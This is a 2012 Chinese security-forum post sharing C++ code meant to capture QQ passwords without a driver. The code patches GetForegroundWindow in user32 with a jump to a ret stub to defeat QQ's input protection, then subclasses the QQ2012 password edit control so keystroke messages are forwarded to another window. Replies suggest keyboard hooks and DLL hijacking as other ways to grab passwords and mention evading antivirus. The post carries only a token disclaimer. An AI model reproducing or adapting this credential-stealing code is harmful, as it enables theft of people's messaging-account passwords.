首页
社区
课程
招聘
[旧帖] [原创]不加载驱动截取QQ密码 0.00雪花
发表于: 2012-11-6 19:27 1753

[旧帖] [原创]不加载驱动截取QQ密码 0.00雪花

2012-11-6 19:27
1753
直接看代码吧。

菜鸟不怎么会说话。

希望版主给我一个邀请码。

还有切勿用于非法行为。如有者。于本人无关。
[HIDE]
/*
 * 修改GetForegroundWindow函数,使得QQ进程不能得知自己成为前台窗口,这样就不会发送干扰输入了;同时修改密码窗口的窗口过程,以便监听
*/

BOOL CalePatchAddr()
{
	FARPROC FuncAddr = GetProcAddress(GetModuleHandle(_T("USER32.DLL")), "GetForegroundWindow");
	byte HookCode[] = {0xC3/*ret*/, 0x90/*nop*/, 0x90, 0x90, 0x90};

	LPVOID CodeAddr = VirtualAlloc(0, 5, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(CodeAddr, HookCode, 5);

	ULONG oData;
	VirtualProtect(FuncAddr, 5, PAGE_EXECUTE_READWRITE, &oData);
	byte NewCode[] = { 0xE9 /*jmp*/, 0, 0, 0, 0 };
	DWORD off = (DWORD)CodeAddr - (DWORD)FuncAddr - 5;

	memcpy(&NewCode[1], &off, 4);
	memcpy(FuncAddr, NewCode, 5);

	return TRUE;
}

WNDPROC pswd_proc = NULL;
HWND recv_hwnd = NULL;

LRESULT CALLBACK WndProc2(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
	SendMessage((HWND)recv_hwnd, message, wParam, lParam);
	return ::CallWindowProc(pswd_proc, hWnd, message, wParam, lParam);
}
void InstallHook()
{
	HWND QQ_hwnd = ::FindWindow(_T("TXGuiFoundation"), _T("QQ2012"));
	if (QQ_hwnd == NULL)
	{
		AfxMessageBox(_T("QQ not found!"));
		return;
	}

	HWND pswd_hwnd = FindWindowEx(QQ_hwnd, 0, _T("Edit"), 0);	//: MsgBox hwnd_qq_psw
	if (pswd_hwnd == NULL)
	{
		AfxMessageBox(_T("pswd HWND not found!"));
		return;
	}
	
	pswd_proc = reinterpret_cast<WNDPROC>(GetWindowLong(pswd_hwnd, GWL_WNDPROC));


	long ret = SetWindowLong(pswd_hwnd, GWL_WNDPROC, (long)WndProc2);
}、
[/HIDE]

[课程]Linux pwn 探索篇!

收藏
免费 0
支持
分享
最新回复 (7)
雪    币: 778
活跃值: (208)
能力值: ( LV9,RANK:260 )
在线值:
发帖
回帖
粉丝
2
楼主就这样能得到QQ密码吗?
2012-11-7 08:34
0
雪    币: 5
活跃值: (108)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
测试。。

能使用HOOK键盘获取密码

SENDMESSAGE 截获消息也行
2012-11-7 22:04
0
雪    币: 9
活跃值: (57)
能力值: (RANK:10 )
在线值:
发帖
回帖
粉丝
4
没用过不了杀软
2012-11-7 22:22
0
雪    币: 5
活跃值: (108)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
呵呵

那是你的技术咯!
2012-11-8 11:12
0
雪    币: 778
活跃值: (208)
能力值: ( LV9,RANK:260 )
在线值:
发帖
回帖
粉丝
6
偶也可以不用驱动截取QQ密码,就是要劫持一下DLL
2012-11-8 11:15
0
雪    币: 111
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
要不要我给你个码 好像改版后 刚够买一个
2012-11-8 11:29
0
雪    币: 5
活跃值: (108)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8


谢谢你,发站内信给我吧
2012-11-8 17:05
0
游客
登录 | 注册 方可回帖
返回
//